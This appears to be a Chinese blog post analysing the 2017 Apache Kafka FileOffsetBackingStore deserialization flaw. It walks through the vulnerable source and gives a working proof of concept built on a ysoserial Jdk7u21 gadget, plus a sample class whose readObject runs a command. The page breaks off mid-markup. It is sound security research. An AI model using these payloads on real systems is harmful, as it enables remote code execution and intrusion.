<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Kafka,Scala,消息中间件," />








  <link rel="shortcut icon" type="image/x-icon" href="/images/pug.jpg?v=5.1.0" />






<meta name="description" content="1.Kafka反序列化漏洞简介Apache Kafka 是开源的 Apache 流处理平台，由 Apache编写，采用scala与java。该项目旨在于提供一个统一的、高吞吐量的、低延迟的实时数据处理平台（中间件模型应用广泛）。
2017年7月19日曝出，Apache kafka connect-runtime 包，在执行 FileOffsetBackingStore 类时，可实现一个反序列化漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="Kafka反序列化漏洞分析">
<meta property="og:url" content="http://shiyueqi.github.io/2017/09/13/Kafka反序列化漏洞/index.html">
<meta property="og:site_name" content="石头头头的博客">
<meta property="og:description" content="1.Kafka反序列化漏洞简介Apache Kafka 是开源的 Apache 流处理平台，由 Apache编写，采用scala与java。该项目旨在于提供一个统一的、高吞吐量的、低延迟的实时数据处理平台（中间件模型应用广泛）。
2017年7月19日曝出，Apache kafka connect-runtime 包，在执行 FileOffsetBackingStore 类时，可实现一个反序列化漏洞">
<meta property="og:image" content="http://shiyueqi.github.io/images/kafka_deserialization_bug_fix_1.jpg">
<meta property="og:image" content="http://shiyueqi.github.io/images/kafka_deserialization_bug_fix_2.jpg">
<meta property="og:image" content="http://shiyueqi.github.io/images/kafka_deserialization_bug_fix_3.jpg">
<meta property="og:updated_time" content="2017-09-14T07:53:17.357Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Kafka反序列化漏洞分析">
<meta name="twitter:description" content="1.Kafka反序列化漏洞简介Apache Kafka 是开源的 Apache 流处理平台，由 Apache编写，采用scala与java。该项目旨在于提供一个统一的、高吞吐量的、低延迟的实时数据处理平台（中间件模型应用广泛）。
2017年7月19日曝出，Apache kafka connect-runtime 包，在执行 FileOffsetBackingStore 类时，可实现一个反序列化漏洞">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://shiyueqi.github.io/2017/09/13/Kafka反序列化漏洞/"/>





  <title> Kafka反序列化漏洞分析 | 石头头头的博客 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?5e9fafb0a8320f0ead8c2b80d6675a83";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">石头头头的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            公益404
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'cYmyKKAbtcky5-pLdKbh','2.0.0');
</script>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://shiyueqi.github.io/2017/09/13/Kafka反序列化漏洞/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shi Yueqi">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/pug.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="石头头头的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Kafka反序列化漏洞分析
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-09-13T19:03:00+08:00">
                2017-09-13
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/技术博客/" itemprop="url" rel="index">
                    <span itemprop="name">技术博客</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/09/13/Kafka反序列化漏洞/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2017/09/13/Kafka反序列化漏洞/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2017/09/13/Kafka反序列化漏洞/" class="leancloud_visitors" data-flag-title="Kafka反序列化漏洞分析">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="1-Kafka_u53CD_u5E8F_u5217_u5316_u6F0F_u6D1E_u7B80_u4ECB"><a href="#1-Kafka_u53CD_u5E8F_u5217_u5316_u6F0F_u6D1E_u7B80_u4ECB" class="headerlink" title="1.Kafka反序列化漏洞简介"></a>1.Kafka反序列化漏洞简介</h1><p>Apache Kafka 是开源的 Apache 流处理平台，由 Apache编写，采用scala与java。该项目旨在于提供一个统一的、高吞吐量的、低延迟的实时数据处理平台（中间件模型应用广泛）。</p>
<p>2017年7月19日曝出，Apache kafka <code>connect-runtime</code> 包，在执行 <code>FileOffsetBackingStore</code> 类时，可实现一个反序列化漏洞，这将导致远程代码执行。</p>
<p>Kafka开源代码 Github：<a href="https://github.com/apache/kafka/" title="https://github.com/apache/kafka/" target="_blank" rel="external">https://github.com/apache/kafka/</a></p>
<p>Kafka官方文档：<a href="http://kafka.apache.org/" title="http://kafka.apache.org/" target="_blank" rel="external">http://kafka.apache.org/</a></p>
<p>官方漏洞公告：<a href="http://seclists.org/oss-sec/2017/q3/184" title="http://seclists.org/oss-sec/2017/q3/184" target="_blank" rel="external">http://seclists.org/oss-sec/2017/q3/184</a></p>
<h1 id="2-_u6F0F_u6D1E_u6982_u8FF0"><a href="#2-_u6F0F_u6D1E_u6982_u8FF0" class="headerlink" title="2.漏洞概述"></a>2.漏洞概述</h1><p>Kafka 内部实现一个带有 <code>readObject</code> 方法的并且未带有任何校验的危险类，如果用户在使用该框架中，使用了该类的话，通过设置相关参数后实例化该类的时候会导致远程代码执行。</p>
<p>受影响版本：Apache Kafka   0.10.0.0 -&gt; 0.11.0.0(2017/09/13当前最新版本为0.11.0.0)</p>
<p>考虑到实际生产环境这样的代码逻辑并不常见，根据影响，确认为中低危漏洞。</p>
<h1 id="3-_u6F0F_u6D1E_u8BE6_u60C5"><a href="#3-_u6F0F_u6D1E_u8BE6_u60C5" class="headerlink" title="3.漏洞详情"></a>3.漏洞详情</h1><p><code>org.apache.kafka.connect.storage.FileOffsetBackingStore</code>  这个class拥有一个反序列化操作,在执行 <code>FileOffsetBackingStore</code> 对象的start方法时候会触发并反序列恶意序列化对象，导致代码执行。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line">	@Override</span><br><span class="line">	public void configure(WorkerConfig config) &#123;</span><br><span class="line">	    super.configure(config);</span><br><span class="line">	    file = new File(config.getString(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG));</span><br><span class="line">	&#125;</span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">调用configure方法后，对类成员变量this.file赋值。赋值为为传入的文件。</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">	@Override</span><br><span class="line">	public synchronized void start() &#123;</span><br><span class="line">	    super.start();</span><br><span class="line">	    log.info("Starting FileOffsetBackingStore with file &#123;&#125;", file);</span><br><span class="line">	    load();</span><br><span class="line">	&#125;</span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">调用start方法后，直接进入load方法。</span><br><span class="line"></span><br><span class="line">```java </span><br><span class="line">	@SuppressWarnings("unchecked")</span><br><span class="line">    private void load() &#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));</span><br><span class="line">            Object obj = is.readObject();</span><br><span class="line">            if (!(obj instanceof HashMap))</span><br><span class="line">                throw new ConnectException("Expected HashMap but found " + obj.getClass());</span><br><span class="line">            Map&lt;byte[], byte[]&gt; raw = (Map&lt;byte[], byte[]&gt;) obj;</span><br><span class="line">            data = new HashMap&lt;&gt;();</span><br><span class="line">            for (Map.Entry&lt;byte[], byte[]&gt; mapEntry : raw.entrySet()) &#123;</span><br><span class="line">                ByteBuffer key = (mapEntry.getKey() != null) ? ByteBuffer.wrap(mapEntry.getKey()) : null;</span><br><span class="line">                ByteBuffer value = (mapEntry.getValue() != null) ? ByteBuffer.wrap(mapEntry.getValue()) : null;</span><br><span class="line">                data.put(key, value);</span><br><span class="line">            &#125;</span><br><span class="line">            is.close();</span><br><span class="line">        &#125; catch (FileNotFoundException | EOFException e) &#123;</span><br><span class="line">            // FileNotFoundException: Ignore, may be new.</span><br><span class="line">            // EOFException: Ignore, this means the file was missing or corrupt</span><br><span class="line">        &#125; catch (IOException | ClassNotFoundException e) &#123;</span><br><span class="line">            throw new ConnectException(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">在load()方法中可以看到通过ObjectInputStream类加载，将this.file的值读取到is中，这里就是我们构造的恶意序列化的对象。而接下来调用的readObject()方法正好会反序列化这个对象。</span><br><span class="line"></span><br><span class="line">而在FileOffsetBackingStore 在反序列化过程中，是直接调用了 java.io.ObjectInputStream 类的 readObject() 方法，没有对传入参数进行验证。这将允许攻击者构造序列化对象并执行恶意代码。</span><br><span class="line"></span><br><span class="line"># 4.漏洞复现</span><br><span class="line">## POC</span><br><span class="line">官方漏洞复现POC：[http://seclists.org/oss-sec/2017/q3/184](http://seclists.org/oss-sec/2017/q3/184 "http://seclists.org/oss-sec/2017/q3/184")</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">		import junit.framework.Test;</span><br><span class="line">		import junit.framework.TestCase;</span><br><span class="line">		import junit.framework.TestSuite;</span><br><span class="line">		import org.apache.commons.io.FileUtils;</span><br><span class="line">		import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;</span><br><span class="line">		import org.apache.kafka.connect.storage.FileOffsetBackingStore;</span><br><span class="line">		import ysoserial.payloads.Jdk7u21;</span><br><span class="line">		</span><br><span class="line">		import java.io.ByteArrayOutputStream;</span><br><span class="line">		import java.io.File;</span><br><span class="line">		import java.io.IOException;</span><br><span class="line">		import java.io.ObjectOutputStream;</span><br><span class="line">		import java.util.HashMap;</span><br><span class="line">		import java.util.Map;</span><br><span class="line">		</span><br><span class="line">		public void test_Kafka_Deser() throws Exception &#123;</span><br><span class="line">		</span><br><span class="line">		        StandaloneConfig config;</span><br><span class="line">		</span><br><span class="line">		        String projectDir = System.getProperty("user.dir");</span><br><span class="line">		</span><br><span class="line">		        Jdk7u21 jdk7u21 = new Jdk7u21();</span><br><span class="line">		        Object o = jdk7u21.getObject("touch vul");</span><br><span class="line">		</span><br><span class="line">		        byte[] ser = serialize(o);</span><br><span class="line">		</span><br><span class="line">		        File tempFile = new File(projectDir + "/payload.ser");</span><br><span class="line">		        FileUtils.writeByteArrayToFile(tempFile, ser);</span><br><span class="line">		</span><br><span class="line">		        Map&lt;String, String&gt; props = new HashMap&lt;String, String&gt;();</span><br><span class="line">		        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,</span><br><span class="line">		tempFile.getAbsolutePath());</span><br><span class="line">		        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,</span><br><span class="line">		"org.apache.kafka.connect.json.JsonConverter");</span><br><span class="line">		        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,</span><br><span class="line">		"org.apache.kafka.connect.json.JsonConverter");</span><br><span class="line">		        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,</span><br><span class="line">		"org.apache.kafka.connect.json.JsonConverter");</span><br><span class="line">		        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,</span><br><span class="line">		"org.apache.kafka.connect.json.JsonConverter");</span><br><span class="line">		        config = new StandaloneConfig(props);</span><br><span class="line">		</span><br><span class="line">		        FileOffsetBackingStore restore = new FileOffsetBackingStore();</span><br><span class="line">		        restore.configure(config);</span><br><span class="line">		        restore.start();</span><br><span class="line">		    &#125;</span><br><span class="line">		</span><br><span class="line">		    private byte[] serialize(Object object) throws IOException &#123;</span><br><span class="line">		        ByteArrayOutputStream bout = new ByteArrayOutputStream();</span><br><span class="line">		        ObjectOutputStream out = new ObjectOutputStream(bout);</span><br><span class="line">		        out.writeObject(object);</span><br><span class="line">		        out.flush();</span><br><span class="line">		        return bout.toByteArray();</span><br><span class="line">		    &#125;</span><br><span class="line">		&#125;</span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">## ysoserial简介</span><br><span class="line">`ysoserial` 是一个构造恶意序列化对象的工具包。</span><br><span class="line"></span><br><span class="line">github地址：[https://github.com/frohoff/ysoserial/](https://github.com/frohoff/ysoserial/ "https://github.com/frohoff/ysoserial/")</span><br><span class="line"></span><br><span class="line">由于该组件没有入maven中央仓库，因此需要将代码clone到本地，编译，部署到本地maven仓库。</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">    git clone git@github.com:frohoff/ysoserial.git</span><br><span class="line">    cd ysoserial</span><br><span class="line">    mvn install -DskipTests</span><br><span class="line">``` </span><br><span class="line">  </span><br><span class="line">## 恶意序列化代码</span><br><span class="line">其实核心的恶意序列化代码是如下两行</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">	Jdk7u21 jdk7u21 = new Jdk7u21();</span><br><span class="line">	Object o = jdk7u21.getObject("touch vul");</span><br></pre></td></tr></table></figure>
<p>由于touch是linux命令，在windows环境下，我改为了如下，即执行计算器程序。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Jdk7u21 jdk7u21 = <span class="keyword">new</span> Jdk7u21();</span><br><span class="line">Object o = jdk7u21.getObject(<span class="string">"calc.exe"</span>);</span><br></pre></td></tr></table></figure>
<p>github demo：<a href="https://github.com/shiyueqi/kafka-deserialization-bug" title="https://github.com/shiyueqi/kafka-deserialization-bug" target="_blank" rel="external">https://github.com/shiyueqi/kafka-deserialization-bug</a></p>
<h1 id="5-_u6E90_u7801_u5206_u6790"><a href="#5-_u6E90_u7801_u5206_u6790" class="headerlink" title="5.源码分析"></a>5.源码分析</h1><h2 id="u6982_u8FF0"><a href="#u6982_u8FF0" class="headerlink" title="概述"></a>概述</h2><p>恶意序列化的核心思想是构造恶意的对象，在执行反序列化过程时，执行构造对象的反序列化方法，从而完成远程漏洞执行。<br>如下代码，构造一个DeserializationObject类，实现readObject方法，方法内调用 <code>Runtime.getRuntime().exec(&quot;calc.exe&quot;);</code> 即通过命令的方式，打开计算器。</p>
<p>完整代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="class"><span class="keyword">class</span> <span class="title">DeserializationObject</span> <span class="keyword">implements</span> <span class="title">Serializable</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(ObjectInputStream input)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException </span>&#123;</span><br><span class="line">        input.defaultReadObject();</span><br><span class="line">        Runtime.getRuntime().exec(<span class="string">"calc.exe"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="u6E90_u7801_u8DDF_u8E2A"><a href="#u6E90_u7801_u8DDF_u8E2A" class="headerlink" title="源码跟踪"></a>源码跟踪</h2><h3 id="FileOffsetBackingStore"><a href="#FileOffsetBackingStore" class="headerlink" title="FileOffsetBackingStore"></a>FileOffsetBackingStore</h3><p>关于FileOffsetBackingStore类的调用代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">FileOffsetBackingStore restore = <span class="keyword">new</span> FileOffsetBackingStore();</span><br><span class="line">   restore.configure(config);</span><br><span class="line">   restore.start();</span><br></pre></td></tr></table></figure>
<p>FileOffsetBackingStore类的configure()方法和start()方法源码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">		<span class="annotation">@Override</span></span><br><span class="line">	    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">configure</span><span class="params">(WorkerConfig config)</span> </span>&#123;</span><br><span class="line">	        <span class="keyword">super</span>.configure(config);</span><br><span class="line">	        file = <span class="keyword">new</span> File(config.getString(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG));</span><br><span class="line">	    &#125;</span><br><span class="line">	</span><br><span class="line">	    <span class="annotation">@Override</span></span><br><span class="line">	    <span class="function"><span class="keyword">public</span> <span class="keyword">synchronized</span> <span class="keyword">void</span> <span class="title">start</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	        <span class="keyword">super</span>.start();</span><br><span class="line">	        log.info(<span class="string">"Starting FileOffsetBackingStore with file &#123;&#125;"</span>, file);</span><br><span class="line">	        load();</span><br><span class="line">	    &#125;</span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">可以看到，调用configure方法后，对类成员变量<span class="keyword">this</span>.file赋值，赋值为为传入的文件。调用start方法后，直接进入load方法。而在这里，我们先构造恶意对象，然后进行序列化，保存到文件中，再将该文件作为参数传入FileOffsetBackingStore类的configure()方法中。</span><br><span class="line"></span><br><span class="line">load()方法如下：</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">		<span class="annotation">@SuppressWarnings</span>(<span class="string">"unchecked"</span>)</span><br><span class="line">	    <span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">load</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	        <span class="keyword">try</span> &#123;</span><br><span class="line">	            ObjectInputStream is = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(file));</span><br><span class="line">	            Object obj = is.readObject();</span><br><span class="line">	            <span class="keyword">if</span> (!(obj <span class="keyword">instanceof</span> HashMap))</span><br><span class="line">	                <span class="keyword">throw</span> <span class="keyword">new</span> ConnectException(<span class="string">"Expected HashMap but found "</span> + obj.getClass());</span><br><span class="line">	            Map&lt;<span class="keyword">byte</span>[], <span class="keyword">byte</span>[]&gt; raw = (Map&lt;<span class="keyword">byte</span>[], <span class="keyword">byte</span>[]&gt;) obj;</span><br><span class="line">	            data = <span class="keyword">new</span> HashMap&lt;&gt;();</span><br><span class="line">	            <span class="keyword">for</span> (Map.Entry&lt;<span class="keyword">byte</span>[], <span class="keyword">byte</span>[]&gt; mapEntry : raw.entrySet()) &#123;</span><br><span class="line">	                ByteBuffer key = (mapEntry.getKey() != <span class="keyword">null</span>) ? ByteBuffer.wrap(mapEntry.getKey()) : <span class="keyword">null</span>;</span><br><span class="line">	                ByteBuffer value = (mapEntry.getValue() != <span class="keyword">null</span>) ? ByteBuffer.wrap(mapEntry.getValue()) : <span class="keyword">null</span>;</span><br><span class="line">	                data.put(key, value);</span><br><span class="line">	            &#125;</span><br><span class="line">	            is.close();</span><br><span class="line">	        &#125; <span class="keyword">catch</span> (FileNotFoundException | EOFException e) &#123;</span><br><span class="line">	            <span class="comment">// FileNotFoundException: Ignore, may be new.</span></span><br><span class="line">	            <span class="comment">// EOFException: Ignore, this means the file was missing or corrupt</span></span><br><span class="line">	        &#125; <span class="keyword">catch</span> (IOException | ClassNotFoundException e) &#123;</span><br><span class="line">	            <span class="keyword">throw</span> <span class="keyword">new</span> ConnectException(e);</span><br><span class="line">	        &#125;</span><br><span class="line">	    &#125;</span><br></pre></td></tr></table></figure>
<p>可以看到刚进入load()方法，即构造ObjectInputStream类对象，</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream is = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(file));</span><br></pre></td></tr></table></figure>
<h3 id="FileInputStream_u7C7B"><a href="#FileInputStream_u7C7B" class="headerlink" title="FileInputStream类"></a>FileInputStream类</h3><p>调用 <code>FileInputStream</code> 类的构造方法，可以看到首先拿到文件的name，再创建一个文件句柄，即 <code>FileDescriptor</code> 类对象，最后调用open方法，将入参file对象内容读入。而open方法已经是调用底层的 <code>native</code> 方法。</p>
<p>该方法的注释中，也声明：对指定的文件，打开一个连接，创建一个文件输入流。一个文件句柄对象会被创建，用来持有该连接。</p>
<p>源码如下：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">		public FileInputStream(File file) throws FileNotFoundException &#123;</span><br><span class="line">	        String name = (file != null ? file.getPath() : null);</span><br><span class="line">	        SecurityManager security = System.getSecurityManager();</span><br><span class="line">	        if (security != null) &#123;</span><br><span class="line">	            security.checkRead(name);</span><br><span class="line">	        &#125;</span><br><span class="line">	        if (name == null) &#123;</span><br><span class="line">	            throw new NullPointerException();</span><br><span class="line">	        &#125;</span><br><span class="line">	        fd = new FileDescriptor();</span><br><span class="line">	        fd.incrementAndGetUseCount();</span><br><span class="line">	        open(name);</span><br><span class="line">	    &#125;</span><br><span class="line">``` </span><br><span 